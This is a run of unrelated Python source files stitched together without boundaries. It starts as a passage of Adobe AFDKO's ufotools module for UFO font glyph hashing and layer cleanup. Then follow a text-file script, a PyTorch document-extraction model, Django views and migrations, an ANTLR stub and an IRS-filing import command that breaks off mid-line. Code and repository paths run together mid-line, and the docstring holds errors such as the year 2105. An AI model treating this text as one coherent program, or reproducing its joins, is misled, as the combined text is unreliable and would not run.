current program. If the old and new hash match, but the program name is not in the history list, then the ufotools will not skip the glyph, and will add the program name to the history list. The only tools using this are, at the moment, checkoutlines, checkoutlinesufo and autohint. checkoutlines and checkoutlinesufo use the hash map to skip processing only when being used to edit glyphs, not when reporting them. checkoutlines necessarily flattens any components in the source glyph file to actual outlines. autohint adds point names, and saves the hint data as a private data in the new GLIF file. autohint saves the hint data in the GLIF private data area, /lib/dict, as a key and data pair. See below for the format. autohint started with _hintFormat1_, a reasonably compact XML representation of the data. In Sep 2105, autohhint switched to _hintFormat2_ in order to be plist compatible. This was necessary in order to be compatible with the UFO spec, by was driven more immediately by the fact the the UFO font file normalization tools stripped out the _hintFormat1_ hint data as invalid elements. """ _hintFormat1_ = """ Deprecated. See _hintFormat2_ below. A element identifies a specific point by its name, and describes a new set of stem hints which should be applied before the specific point. A element identifies a specific point by its name. The point is the first point of a curve. The presence of the element is a processing suggestion, that the curve and its successor curve should be converted to a flex operator. One challenge in applying the hintset and flex elements is that in the GLIF format, there is no explicit start and end operator: the first path operator is both the end and the start of the path. I have chosen to convert this to T1 by taking the first path operator, and making it a move-to. I then also use it as the last path operator. An exception is a line-to; in T1, this is omitted, as it is implied by the need to close the path. Hence, if a hintset references the first operator, there is a potential ambiguity: should it be applied before the T1 move-to, or before the final T1 path operator? The logic here applies it before the move-to only. ... ()* ()* * * * (* ( (positive integer)+ )+ )* * Example from "B" in SourceCodePro-Regular """ _hintFormat2_ = """ A element in the hintSetList array identifies a specific point by its name, and describes a new set of stem hints which should be applied before the specific point. A element in the flexList identifies a specific point by its name. The point is the first point of a curve. The presence of the element is a processing suggestion, that the curve and its successor curve should be converted to a flex operator. One challenge in applying the hintSetList and flexList elements is that in the GLIF format, there is no explicit start and end operator: the first path operator is both the end and the start of the path. I have chosen to convert this to T1 by taking the first path operator, and making it a move-to. I then also use it as the last path operator. An exception is a line-to; in T1, this is omitted, as it is implied by the need to close the path. Hence, if a hintset references the first operator, there is a potential ambiguity: should it be applied before the T1 move-to, or before the final T1 path operator? The logic here applies it before the move-to only. ... id hintSetList pointTag stems hstem * vstem * hstem3 ... * vstem3 ... * * flexList* + Example from "B" in SourceCodePro-Regular id 64bf4987f05ced2a50195f971cd924984047eb1d79c8c43e6a0054f59cc85dea23 a49deb20946a4ea84840534363f7a13cca31a81b1e7e33c832185173369086 hintSetList pointTag hintSet0000 stems hstem 338 28 hstem 632 28 hstem 100 32 hstem 496 32 pointTag hintSet0005 stems hstem 0 28 hstem 338 28 hstem 632 28 hstem 100 32 hstem 454 32 hstem 496 32 pointTag hintSet0016 stems hstem 0 28 hstem 338 28 hstem 632 28 hstem 100 32 hstem 496 32 """ # UFO names kDefaultGlyphsLayerName = "public.default" kDefaultGlyphsLayer = "glyphs" kProcessedGlyphsLayerName = "com.adobe.type.processedglyphs" kProcessedGlyphsLayer = "glyphs.%s" % kProcessedGlyphsLayerName DEFAULT_LAYER_ENTRY = [kDefaultGlyphsLayerName, kDefaultGlyphsLayer] PROCESSED_LAYER_ENTRY = [kProcessedGlyphsLayerName, kProcessedGlyphsLayer] kFontInfoName = "fontinfo.plist" kContentsName = "contents.plist" kLibName = "lib.plist" kPublicGlyphOrderKey = "public.glyphOrder" kAdobeDomainPrefix = "com.adobe.type" kAdobHashMapName = "%s.processedHashMap" % kAdobeDomainPrefix kAdobHashMapVersionName = "hashMapVersion" kAdobHashMapVersion = (1, 0) # If major version differs, do not use. kAutohintName = "autohint" kCheckOutlineName = "checkOutlines" kCheckOutlineNameUFO = "checkOutlines" kOutlinePattern = re.compile(r"", re.DOTALL) COMP_TRANSFORM = OrderedDict([ ('xScale', '1'), ('xyScale', '0'), ('yxScale', '0'), ('yScale', '1'), ('xOffset', '0'), ('yOffset', '0') ]) class UFOParseError(Exception): pass class UFOFontData(object): def __init__(self, parentPath, useHashMap, programName): self.parentPath = parentPath self.glyphMap = {} self.processedLayerGlyphMap = {} self.newGlyphMap = {} self.glyphList = [] self.fontInfo = None # If False, will skip reading hashmap and # testing to see if glyph can be skipped. # Should be used only when calling program is # running in report mode only, and not changing # any glyph data. self.useHashMap = useHashMap # Used to skip getting glyph data when glyph # hash matches hash of current glyph data. self.hashMap = {} self.fontDict = None self.programName = programName self.curSrcDir = None self.hashMapChanged = False self.glyphDefaultDir = os.path.join(self.parentPath, "glyphs") self.glyphLayerDir = os.path.join(self.parentPath, kProcessedGlyphsLayer) self.glyphWriteDir = self.glyphLayerDir self.historyList = [] self.requiredHistory = [] # See documentation above. # If False, then read data only from the default layer; # else read glyphs from processed layer, if it exists. self.useProcessedLayer = False # If True, then write data to the default layer self.writeToDefaultLayer = False # If True, then do not skip any glyphs. self.doAll = False # track whether checkSkipGLyph has deleted an # out-of-date glyph from the processed glyph layer self.deletedGlyph = False # If true, do NOT round x,y values when processing self.allowDecimalCoords = False self.glyphSet = UFOReader(self.parentPath, validate=False).getGlyphSet(None) def getGlyphMap(self): if len(self.glyphMap) == 0: self.loadGlyphMap() return self.glyphMap def readHashMap(self): hashPath = os.path.join(self.parentPath, "data", kAdobHashMapName) if os.path.exists(hashPath): with open(hashPath, "r", encoding='utf-8') as fp: data = fp.read() newMap = ast.literal_eval(data) else: newMap = {kAdobHashMapVersionName: kAdobHashMapVersion} try: version = newMap[kAdobHashMapVersionName] if version[0] > kAdobHashMapVersion[0]: raise UFOParseError("Hash map version is newer than program. " "Please update the FDK") elif version[0] < kAdobHashMapVersion[0]: print("Updating hash map: was older version") newMap = {kAdobHashMapVersionName: kAdobHashMapVersion} except KeyError: print("Updating hash map: was older version") newMap = {kAdobHashMapVersionName: kAdobHashMapVersion} self.hashMap = newMap def writeHashMap(self): hashMap = self.hashMap if len(hashMap) == 0: return # no glyphs were processed. hashDir = os.path.join(self.parentPath, "data") if not os.path.exists(hashDir): os.makedirs(hashDir) hashPath = os.path.join(hashDir, kAdobHashMapName) hasMapKeys = sorted(hashMap.keys()) data = ["{"] for gName in hasMapKeys: data.append("'%s': %s," % (gName, hashMap[gName])) data.append("}") data.append("") data = '\n'.join(data) with open(hashPath, "w") as fp: fp.write(data) def getGlyphSrcPath(self, glyphName): if len(self.glyphMap) == 0: self.loadGlyphMap() glyphFileName = self.glyphMap[glyphName] # Try for processed layer first if self.useProcessedLayer and self.processedLayerGlyphMap: try: glyphFileName = self.processedLayerGlyphMap[glyphName] self.curSrcDir = self.glyphLayerDir glyphPath = os.path.join(self.glyphLayerDir, glyphFileName) if os.path.exists(glyphPath): return glyphPath except KeyError: pass self.curSrcDir = self.glyphDefaultDir glyphPath = os.path.join(self.curSrcDir, glyphFileName) return glyphPath def getGlyphDefaultPath(self, glyphName): if len(self.glyphMap) == 0: self.loadGlyphMap() glyphFileName = self.glyphMap[glyphName] glyphPath = os.path.join(self.glyphDefaultDir, glyphFileName) return glyphPath def getGlyphProcessedPath(self, glyphName): if len(self.glyphMap) == 0: self.loadGlyphMap() if not self.processedLayerGlyphMap: return None try: glyphFileName = self.processedLayerGlyphMap[glyphName] glyphPath = os.path.join(self.glyphLayerDir, glyphFileName) except KeyError: glyphPath = None return glyphPath def checkSkipGlyph(self, glyphName, newSrcHash, doAll): skip = False if not self.useHashMap: return skip if len(self.hashMap) == 0: # Hash maps have not yet been read in. Get them. self.readHashMap() hashEntry = srcHash = None historyList = [] programHistoryIndex = -1 # not found in historyList # Get hash entry for glyph try: hashEntry = self.hashMap[glyphName] srcHash, historyList = hashEntry try: programHistoryIndex = historyList.index(self.programName) except ValueError: pass except KeyError: # Glyph is as yet untouched by any program. pass if (srcHash == newSrcHash): if (programHistoryIndex >= 0): # The glyph has already been processed by this program, # and there have been no changes since. skip = True and (not doAll) if not skip: # case for Checkoutlines if not self.useProcessedLayer: self.hashMapChanged = True self.hashMap[glyphName] = [newSrcHash, [self.programName]] glyphPath = self.getGlyphProcessedPath(glyphName) if glyphPath and os.path.exists(glyphPath): os.remove(glyphPath) else: if (programHistoryIndex < 0): historyList.append(self.programName) else: # case for autohint if self.useProcessedLayer: # Default layer glyph and stored glyph hash differ, and # useProcessedLayer is True. If any of the programs in # requiredHistory in are in the historyList, we need to # complain and skip. foundMatch = False if len(historyList) > 0: for programName in self.requiredHistory: if programName in historyList: foundMatch = True if foundMatch: print("Error. Glyph '%s' has been edited. You must first " "run '%s' before running '%s'. Skipping." % (glyphName, self.requiredHistory, self.programName)) skip = True # If the source hash has changed, we need to # delete the processed layer glyph. self.hashMapChanged = True self.hashMap[glyphName] = [newSrcHash, [self.programName]] glyphPath = self.getGlyphProcessedPath(glyphName) if glyphPath and os.path.exists(glyphPath): os.remove(glyphPath) self.deletedGlyph = True return skip @staticmethod def getGlyphXML(glyphDir, glyphFileName): glyphPath = os.path.join(glyphDir, glyphFileName) # default etRoot = ET.ElementTree() glifXML = etRoot.parse(glyphPath) outlineXML = glifXML.find("outline") try: widthXML = glifXML.find("advance") if widthXML is not None: width = round(ast.literal_eval(widthXML.get("width", '0')), 9) else: width = 0 except UFOParseError as e: print(f"Error. skipping glyph '{glyphFileName}' because " f"of parse error: {str(e)}") return None, None, None return width, glifXML, outlineXML def getOrSkipGlyph(self, glyphName, doAll=0): # Get default glyph layer data, so we can check if the glyph # has been edited since this program was last run. # If the program name is in the history list, and the srcHash # matches the default glyph layer data, we can skip. if len(self.glyphMap) == 0: self.loadGlyphMap() glyphFileName = self.glyphMap.get(glyphName) if not glyphFileName: return None, True # skip width, glifXML, outlineXML = self.getGlyphXML(self.glyphDefaultDir, glyphFileName) if glifXML is None: return None, True # skip # Hash is always from the default glyph layer. useDefaultGlyphDir = True newHash, _ = self.buildGlyphHashValue( width, outlineXML, glyphName, useDefaultGlyphDir) skip = self.checkSkipGlyph(glyphName, newHash, doAll) # If self.useProcessedLayer and there is a glyph in the # processed layer, get the outline from that. if self.useProcessedLayer and self.processedLayerGlyphMap: try: glyphFileName = self.processedLayerGlyphMap[glyphName] except KeyError: pass glyphPath = os.path.join(self.glyphLayerDir, glyphFileName) if os.path.exists(glyphPath): width, glifXML, _ = self.getGlyphXML( self.glyphLayerDir, glyphFileName) if glifXML is None: return None, True # skip return width, skip def loadGlyphMap(self): # Need to both get the list of glyphs from contents.plist, and also # the glyph order. The latter is take from the public.glyphOrder key # in lib.plist, if it exists, else it is taken from the contents.plist # file. Any glyphs in contents.plist which are not named in the # public.glyphOrder are sorted after all glyphs which are named in the # public.glyphOrder,, in the order that they occured in contents.plist. contentsPath = os.path.join(self.parentPath, "glyphs", kContentsName) self.glyphMap, self.glyphList = parsePList(contentsPath) orderPath = os.path.join(self.parentPath, kLibName) self.orderMap = parseGlyphOrder(orderPath) if self.orderMap is not None: orderIndex = len(self.orderMap) orderList = [] # If there are glyphs in the font which are not named in the # public.glyphOrder entry, add then in the order of the # contents.plist file. for glyphName in self.glyphList: try: entry = [self.orderMap[glyphName], glyphName] except KeyError: entry = [orderIndex, glyphName] self.orderMap[glyphName] = orderIndex orderIndex += 1 orderList.append(entry) orderList.sort() self.glyphList = [] for entry in orderList: self.glyphList.append(entry[1]) else: self.orderMap = {} numGlyphs = len(self.glyphList) for i in range(numGlyphs): self.orderMap[self.glyphList[i]] = i # We also need to get the glyph map for the processed layer, # and use this when the glyph is read from the processed layer. # Because checkoutlinesufo used the defcon library, it can write # glyph file names that differ from what is in the default glyph layer. contentsPath = os.path.join(self.glyphLayerDir, kContentsName) if os.path.exists(contentsPath): self.processedLayerGlyphMap, self.processedLayerGlyphList = \ parsePList(contentsPath) @staticmethod def _rd_val(str_val): """Round and normalize a (string) GLIF value""" return repr(norm_float(round(ast.literal_eval(str_val), 9))) def buildGlyphHashValue(self, width, outlineXML, glyphName, useDefaultGlyphDir, level=0): """ glyphData must be the official XML from a GLIF. We skip contours with only one point. """ dataList = ["w%s" % norm_float(round(width, 9))] if level > 10: raise UFOParseError( "In parsing component, exceeded 10 levels of reference. " "'%s'. " % (glyphName)) # tag is optional per spec., e.g. space glyph # does not necessarily have it. if outlineXML is not None: for childContour in outlineXML: if childContour.tag == "contour": if len(childContour) < 2: continue for child in childContour: if child.tag == "point": ptType = child.get("type") pointType = '' if ptType is None else ptType[0] x = self._rd_val(child.get("x")) y = self._rd_val(child.get("y")) dataList.append("%s%s%s" % (pointType, x, y)) elif childContour.tag == "component": # append the component hash. compGlyphName = childContour.get("base") if compGlyphName is None: raise UFOParseError( "'%s' is missing the 'base' attribute in a " "component." % glyphName) dataList.append("%s%s" % ("base:", compGlyphName)) if useDefaultGlyphDir: try: componentPath = self.getGlyphDefaultPath( compGlyphName) except KeyError: raise UFOParseError( "'%s' component glyph is missing from " "contents.plist." % (compGlyphName)) else: # If we are not necessarily using the default layer # for the main glyph, then a missing component may not # have been processed, and may just be in the default # layer. We need to look for component glyphs in the # src list first, then in the defualt layer. try: componentPath = self.getGlyphSrcPath(compGlyphName) if not os.path.exists(componentPath): componentPath = self.getGlyphDefaultPath( compGlyphName) except KeyError: try: componentPath = self.getGlyphDefaultPath( compGlyphName) except KeyError: raise UFOParseError( "'%s' component glyph is missing from " "contents.plist." % (compGlyphName)) if not os.path.exists(componentPath): raise UFOParseError( "'%s' component file is missing: '%s'." % (compGlyphName, componentPath)) etRoot = ET.ElementTree() # Collect transform values for trans_key, flbk_val in COMP_TRANSFORM.items(): value = childContour.get(trans_key, flbk_val) dataList.append(self._rd_val(value)) componentXML = etRoot.parse(componentPath) componentOutlineXML = componentXML.find("outline") _, componentDataList = self.buildGlyphHashValue( width, componentOutlineXML, glyphName, useDefaultGlyphDir, level + 1) dataList.extend(componentDataList) data = "".join(dataList) if len(data) >= 128: data = hashlib.sha512(data.encode("ascii")).hexdigest() return data, dataList def close(self): if self.hashMapChanged: self.writeHashMap() self.hashMapChanged = False def parseGlyphOrder(filePath): orderMap = None if os.path.exists(filePath): publicOrderDict, _ = parsePList(filePath, kPublicGlyphOrderKey) if publicOrderDict is not None: orderMap = {} glyphList = publicOrderDict[kPublicGlyphOrderKey] numGlyphs = len(glyphList) for i in range(numGlyphs): orderMap[glyphList[i]] = i return orderMap def parsePList(filePath, dictKey=None): # If dictKey is defined, parse and return only the data for that key. # # Updates July 2019: # - use fontTools.misc.plistlib instead of ET to parse # - use built-in OrderedDict as the dict_type to preserve ordering # - use simpler filtering for non-None dictKey plistDict = {} plistKeys = [] with open(filePath, 'r', encoding='utf-8') as fp: plistDict = plistlib.load(fp, dict_type=OrderedDict) if dictKey is not None: if dictKey in plistDict: plistDict = {dictKey: plistDict[dictKey]} else: plistDict = None if plistDict is not None: plistKeys = list(plistDict.keys()) return plistDict, plistKeys def addWhiteSpace(parent, level): child = None childIndent = '\n' + (" " * (level + 1)) prentIndent = '\n' + (" " * (level)) # print("parent Tag", parent.tag, repr(parent.text), repr(parent.tail)) for child in parent: child.tail = childIndent addWhiteSpace(child, level + 1) if child is not None: if parent.text is None: parent.text = childIndent child.tail = prentIndent # print("lastChild Tag", child.tag, repr(child.text), # repr(child.tail), "parent Tag", parent.tag) def regenerate_glyph_hashes(ufo_font_data): """ The handling of the glyph hashes is super convoluted. This method fixes https://github.com/adobe-type-tools/afdko/issues/349 """ for gname, gfilename in ufo_font_data.getGlyphMap().items(): gwidth, _, outline_xml = ufo_font_data.getGlyphXML( ufo_font_data.glyphDefaultDir, gfilename) hash_entry = ufo_font_data.hashMap.get(gname, None) if not hash_entry: continue ghash, _ = ufo_font_data.buildGlyphHashValue( gwidth, outline_xml, gname, True) hash_entry[0] = ghash def checkHashMaps(fontPath, doSync): """ Checks if the hashes of the glyphs in the default layer match the hash values stored in the UFO's 'data/com.adobe.type.processedHashMap' file. Returns a tuple of a boolean and a list. The boolean is True if all glyph hashes matched. The list contains strings that report the glyph names whose hash did not match. If doSync is True, it will delete any glyph in the processed glyph layer directory which does not have a matching glyph in the default layer, or whose source glyph hash does not match. It will then update the contents.plist file for the processed glyph layer, and delete the program specific hash maps. """ msgList = [] allMatch = True ufoFontData = UFOFontData(fontPath, True, '') ufoFontData.readHashMap() # Don't need to check the glyph hashes if there aren't any. if not ufoFontData.hashMap: return allMatch, msgList for glyphName, glyphFileName in ufoFontData.getGlyphMap().items(): hash_entry = ufoFontData.hashMap.get(glyphName, None) if not hash_entry: continue else: oldHash = hash_entry[0] width, _, outlineXML = ufoFontData.getGlyphXML( ufoFontData.glyphDefaultDir, glyphFileName) if outlineXML is None: continue newHash, _ = ufoFontData.buildGlyphHashValue( width, outlineXML, glyphName, True) if oldHash != newHash: allMatch = False if len(msgList) < 10: msgList.append("Glyph %s seems to have been modified since " "last time checkoutlinesufo processed this " "font." % glyphName) elif len(msgList) == 10: msgList.append("(additional messages omitted)") if doSync: fileList = os.listdir(ufoFontData.glyphWriteDir) fileList = filter(lambda fileName: fileName.endswith(".glif"), fileList) # invert glyphMap fileMap = {} for glyphName, fileName in ufoFontData.glyphMap.items(): fileMap[fileName] = glyphName for fileName in fileList: if fileName in fileMap and ( fileMap[fileName] in ufoFontData.hashMap): continue # Either not in glyphMap, or not in hashMap. Exterminate. try: glyphPath = os.path.join(ufoFontData.glyphWriteDir, fileName) os.remove(glyphPath) print("Removed outdated file: %s" % glyphPath) except OSError: print("Cannot delete outdated file: %s" % glyphPath) return allMatch, msgList kAdobeLCALtSuffix = ".adobe.lc.altsuffix" def cleanUpGLIFFiles(defaultContentsFilePath, glyphDirPath, doWarning=True): changed = 0 contentsFilePath = os.path.join(glyphDirPath, kContentsName) # maps glyph names to files. with open(contentsFilePath, 'r', encoding='utf-8') as fp: contentsDict = plistlib.load(fp) # First, delete glyph files that are not in the contents.plist file in # the glyphDirPath. In some UFOfont files, we end up with case errors, # so we need to check for a lower-case version of the file name. fileDict = {} for glyphName, fileName in contentsDict.items(): fileDict[fileName] = glyphName lcFileName = fileName.lower() if lcFileName != fileName: fileDict[lcFileName + kAdobeLCALtSuffix] = glyphName fileList = os.listdir(glyphDirPath) for fileName in fileList: if not fileName.endswith(".glif"): continue if fileName in fileDict: continue lcFileName = fileName.lower() if (lcFileName + kAdobeLCALtSuffix) in fileDict: # glif file exists which has a case-insensitive match to file name # entry in the contents.plist file; assume latter is intended, and # change the file name to match. glyphFilePathOld = os.path.join(glyphDirPath, fileName) glyphFilePathNew = os.path.join(glyphDirPath, lcFileName) os.rename(glyphFilePathOld, glyphFilePathNew) continue glyphFilePath = os.path.join(glyphDirPath, fileName) os.remove(glyphFilePath) if doWarning: print("Removing glif file %s that was not in the contents.plist " "file: %s" % (glyphDirPath, contentsFilePath)) changed = 1 if defaultContentsFilePath == contentsFilePath: return changed # Now remove glyphs that are not referenced in the defaultContentsFilePath. # Since the processed glyph layer is written with the defcon module, # and the default layer may be written by anything, the actual glyph file # names may be different for the same UFO glyph. We need to compare by UFO # glyph name, not file name. with open(defaultContentsFilePath, 'r', encoding='utf-8') as fp: defaultContentsDict = plistlib.load(fp) fileList = os.listdir(glyphDirPath) for fileName in fileList: if not fileName.endswith(".glif"): continue try: glyphName = fileDict[fileName] if glyphName not in defaultContentsDict: glyphFilePath = os.path.join(glyphDirPath, fileName) os.remove(glyphFilePath) if doWarning: print("Removing glif %s that was not in the " "contents.plist file: %s" % ( glyphName, defaultContentsFilePath)) changed = 1 except KeyError: print("Shouldn't happen %s %s" % ( glyphName, defaultContentsFilePath)) return changed def cleanupContentsList(glyphDirPath, doWarning=True): contentsFilePath = os.path.join(glyphDirPath, kContentsName) # maps glyph names to files. with open(contentsFilePath, 'r', encoding='utf-8') as fp: contentsDict = plistlib.load(fp) fileDict = {} fileList = os.listdir(glyphDirPath) for fileName in fileList: fileDict[fileName] = 1 changed = 0 # now update and write the processed processedGlyphDirPath # contents.plist file. itemList = list(contentsDict.items()) for glyphName, fileName in itemList: if fileName not in fileDict: del contentsDict[glyphName] changed = 1 if doWarning: print("Removing contents.plist entry where glif was missing: " "%s, %s, %s" % (glyphName, fileName, glyphDirPath)) if changed: with open(contentsFilePath, 'wb') as fp: plistlib.dump(contentsDict, fp) def validateLayers(ufoFontPath, doWarning=True): # Read glyphs/contents.plist file. # Delete any glyphs on /glyphs or /processed glyphs which are not in # glyphs/contents.plist file. Delete any entries in the contents.plist # file which are not in the glyph files. Filter contents list with what's # in /processed glyphs: write to process/plist file.' The most common way # that this is needed in the AFDKO workflow is if someone kills # checkoutlines/checkoutlinesufo or autohint while it is running. Since # the program may delete glyphs from the processed layer while running, # and the contents.plist file is updated only when the changed font is # saved, the contents.plist file in the processed layer ends up referencing # glyphs that aren't there anymore. You can also get extra glyphs not in # the contents.plist file by several editing workflows. # First, clean up the default layer. glyphDirPath = os.path.join(ufoFontPath, "glyphs") defaultContentsFilePath = os.path.join( ufoFontPath, "glyphs", kContentsName) # Happens when called on a font which is not a UFO font. if not os.path.exists(defaultContentsFilePath): return # remove glif files not in contents.plist cleanUpGLIFFiles(defaultContentsFilePath, glyphDirPath, doWarning) # remove entries for glif files that don't exist cleanupContentsList(glyphDirPath, doWarning) # now for the processed dir. glyphDirPath = os.path.join(ufoFontPath, kProcessedGlyphsLayer) if not os.path.exists(glyphDirPath): return # Remove any glif files that are not in both the processed glif directory # contents.plist file and the default contents .plist file. # This will happen pretty often, as glif files are deleted from the # processed glyph layer is their hash differs from the current hash for # the glyph in the default layer. cleanUpGLIFFiles(defaultContentsFilePath, glyphDirPath, doWarning) cleanupContentsList(glyphDirPath, doWarning) def makeUFOFMNDB(srcFontPath): fontInfoPath = os.path.join(srcFontPath, kFontInfoName) # default fiMap, _ = parsePList(fontInfoPath) psName = "NoFamilyName-Regular" familyName = "NoFamilyName" styleName = "Regular" try: psName = fiMap["postscriptFontName"] parts = psName.split("-") familyName = parts[0] if len(parts) > 1: styleName = parts[1] except KeyError: print("ufotools [Warning] UFO font is missing 'postscriptFontName'") try: familyName = fiMap["openTypeNamePreferredFamilyName"] except KeyError: try: familyName = fiMap["familyName"] except KeyError: print("ufotools [Warning] UFO font is missing 'familyName'") try: styleName = fiMap["openTypeNamePreferredSubfamilyName"] except KeyError: try: styleName = fiMap["styleName"] except KeyError: print("ufotools [Warning] UFO font is missing 'styleName'") fmndbPath = fdkutils.get_temp_file_path() parts = [] parts.append("[%s]" % (psName)) parts.append("\tf=%s" % (familyName)) parts.append("\ts=%s" % (styleName)) parts.append("") data = '\n'.join(parts) with open(fmndbPath, "w") as fp: fp.write(data) return fmndbPath def thresholdAttrGlyph(aGlyph, threshold=0.5): """ Like fontPens.thresholdPen.thresholdGlyph, but preserves some glyph- and point-level attributes that are not preserved by that method. """ # preserve glyph-level attributes attrnames = ['anchors'] attrs = {k: getattr(aGlyph, k, None) for k in attrnames if hasattr(aGlyph, k)} # noqa: E501 # filter with ThresholdPen into recording pen recorder = RecordingPen() filterpen = ThresholdPen(recorder, threshold) aGlyph.draw(filterpen) aGlyph.clear() recorder.replay(aGlyph.getPen()) # restore glyph-level attributes for k, v in attrs.items(): setattr(aGlyph, k, v) return aGlyph my_file = open('text.txt','r') def removeLines(file): file_lines = file.readlines() new_file = [] new_line = '' i = 0 print(file_lines) for line in file_lines: if line.count('\n') > 0: new_line = line.replace('\n',' ') new_file.append(new_line) return new_file # print(lines) def readCharNumber(file): i = 0 file.seek(0) for f in file.read(): if f == 'h' or f == 'H': i += 1 return i def readLines(lines): for line in lines: print(line) print(readCharNumber(my_file)) readLines(my_file) print(removeLines(my_file))# -*- coding: utf-8 -*- # @Author: # @Created Time: 7/8/2020 10:54 PM from pickle import NONE from typing import * import torch import torch.nn as nn import numpy as np from .encoder import Encoder from .graph import GLCN from .decoder import Decoder from utils.class_utils import keys_vocab_cls, iob_labels_vocab_cls class PICKModel(nn.Module): def __init__(self, **kwargs): super().__init__() embedding_kwargs = kwargs['embedding_kwargs'] encoder_kwargs = kwargs['encoder_kwargs'] graph_kwargs = kwargs['graph_kwargs'] decoder_kwargs = kwargs['decoder_kwargs'] self.make_model(embedding_kwargs, encoder_kwargs, graph_kwargs, decoder_kwargs) def make_model(self, embedding_kwargs, encoder_kwargs, graph_kwargs, decoder_kwargs): # Given the params of each component, creates components. # embedding_kwargs-> word_emb embedding_kwargs['num_embeddings'] = len(keys_vocab_cls) self.word_emb = nn.Embedding(**embedding_kwargs) encoder_kwargs['char_embedding_dim'] = embedding_kwargs['embedding_dim'] self.encoder = Encoder(**encoder_kwargs) graph_kwargs['in_dim'] = encoder_kwargs['out_dim'] graph_kwargs['out_dim'] = encoder_kwargs['out_dim'] self.graph = GLCN(**graph_kwargs) decoder_kwargs['bilstm_kwargs']['input_size'] = encoder_kwargs['out_dim'] if decoder_kwargs['bilstm_kwargs']['bidirectional']: decoder_kwargs['mlp_kwargs']['in_dim'] = decoder_kwargs['bilstm_kwargs']['hidden_size'] * 2 else: decoder_kwargs['mlp_kwargs']['in_dim'] = decoder_kwargs['bilstm_kwargs']['hidden_size'] decoder_kwargs['mlp_kwargs']['out_dim'] = len(iob_labels_vocab_cls) decoder_kwargs['crf_kwargs']['num_tags'] = len(iob_labels_vocab_cls) self.decoder = Decoder(**decoder_kwargs) def _aggregate_avg_pooling(self, input, text_mask): ''' Apply mean pooling over time (text length), (B*N, T, D) -> (B*N, D) :param input: (B*N, T, D) :param text_mask: (B*N, T) :return: (B*N, D) ''' # filter out padding value, (B*N, T, D) input = input * text_mask.detach().unsqueeze(2).float() # (B*N, D) sum_out = torch.sum(input, dim=1) # (B*N, ) text_len = text_mask.float().sum(dim=1) # (B*N, D) text_len = text_len.unsqueeze(1).expand_as(sum_out) text_len = text_len + text_len.eq(0).float() # avoid divide zero denominator # (B*N, D) mean_out = sum_out.div(text_len) return mean_out @staticmethod def compute_mask(mask: torch.Tensor): ''' :param mask: (B, N, T) :return: True for masked key position according to pytorch official implementation of Transformer ''' B, N, T = mask.shape mask = mask.reshape(B * N, T) mask_sum = mask.sum(dim=-1) # (B*N,) # (B*N,) graph_node_mask = mask_sum != 0 # (B * N, T) graph_node_mask = graph_node_mask.unsqueeze(-1).expand(B * N, T) # True for valid node # If src key are all be masked (indicting text segments is null), atten_weight will be nan after softmax # in self-attention layer of Transformer. # So we do not mask all padded sample. Instead we mask it after Transformer encoding. src_key_padding_mask = torch.logical_not(mask.bool()) & graph_node_mask # True for padding mask position return src_key_padding_mask, graph_node_mask def forward(self, **kwargs): # input # whole_image = kwargs['whole_image'] # (B, 3, H, W) whole_image = None relation_features = kwargs['relation_features'] # initial relation embedding (B, N, N, 6) text_segments = kwargs['text_segments'] # text segments (B, N, T) text_length = kwargs['text_length'] # (B, N) iob_tags_label = kwargs['iob_tags_label'] if self.training else None # (B, N, T) mask = kwargs['mask'] # (B, N, T) # boxes_coordinate = kwargs['boxes_coordinate'] # (B, num_boxes, 8) boxes_coordinate = None # (B, num_boxes, 8) ##### Forward Begin ##### ### Encoder module ### # word embeddin text_emb = self.word_emb(text_segments) # src_key_padding_mask is text padding mask, True is padding value (B*N, T) # graph_node_mask is mask for graph, True is valid node, (B*N, T) src_key_padding_mask, graph_node_mask = self.compute_mask(mask) # set of nodes, (B*N, T, D) x = self.encoder(images=whole_image, boxes_coordinate=boxes_coordinate, transcripts=text_emb, src_key_padding_mask=src_key_padding_mask) ### Graph module ### # text_mask, True for valid, (including all not valid node), (B*N, T) text_mask = torch.logical_not(src_key_padding_mask).byte() # (B*N, T, D) -> (B*N, D) x_gcn = self._aggregate_avg_pooling(x, text_mask) # (B*N, 1),True is valid node graph_node_mask = graph_node_mask.any(dim=-1, keepdim=True) # (B*N, D), filter out not valid node x_gcn = x_gcn * graph_node_mask.byte() # initial adjacent matrix (B, N, N) B, N, T = mask.shape init_adj = torch.ones((B, N, N), device=text_emb.device) boxes_num = mask[:, :, 0].sum(dim=1, keepdim=True) # (B, 1) # (B, N, D) x_gcn = x_gcn.reshape(B, N, -1) # (B, N, D), (B, N, N), (B,) x_gcn, soft_adj, gl_loss = self.graph(x_gcn, relation_features, init_adj, boxes_num) adj = soft_adj * init_adj ### Decoder module ### logits, new_mask, log_likelihood = self.decoder(x.reshape(B, N, T, -1), x_gcn, mask, text_length, iob_tags_label) ##### Forward End ##### output = {"logits": logits, "new_mask": new_mask, "adj": adj} if self.training: output['gl_loss'] = gl_loss crf_loss = -log_likelihood output['crf_loss'] = crf_loss return output def __str__(self): ''' Model prints with number of trainable parameters ''' model_parameters = filter(lambda p: p.requires_grad, self.parameters()) params = sum([np.prod(p.size()) for p in model_parameters]) return super().__str__() + '\nTrainable parameters: {}'.format(params) def model_parameters(self): model_parameters = filter(lambda p: p.requires_grad, self.parameters()) params = sum([np.prod(p.size()) for p in model_parameters]) return params saygindogu/PersonalPortfolioWebsiteportfolio/jobs/views.py from django.shortcuts import render from .models import Job # Create your views here. def home( request ): steve = Job.objects return render(request, 'jobs/home.html', { 'jobs': steve}) 100-1000 # # ANTLR Translator Generator # Project led by at http://www.jGuru.com # Software rights: http://www.antlr.org/license.html # # $Id$ # from antlr import * devna-dev/durar-backend # Generated by Django 3.0.8 on 2020-07-09 03:09 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('books', '0029_auto_20200704_1942'), ] operations = [ migrations.AddField( model_name='bookmedia', name='duration', field=models.PositiveIntegerField(null=True, verbose_name='Audio duration'), ), ] import unicodecsv as csv import json from django.core.management.base import BaseCommand from django.conf import settings from django.db import reset_queries, connection from irsx.xmlrunner import XMLRunner from irsx.filing import Filing from irsx.standardizer import Standardizer from filing.models import xml_submission as XMLSubmission, ProcessedFiling unicodeType = type(unicode()) class Command(BaseCommand): help = 'Dump some fields that are of interest' def handle(self, *args, **options): self.xml_runner = None self.standardizer = Standardizer() count = 0 submissions = XMLSubmission.objects.filter( schema_year__gte=2013, sub_date__contains='2017' ).values('taxpayer_name', 'tax_period', 'sub_date', 'object_id') for submission in submissions: count += 1 if count % 100 == 0: print ("Processed %s filings" % count) reset_queries() # not sure this will matter, but... self.xml_runner 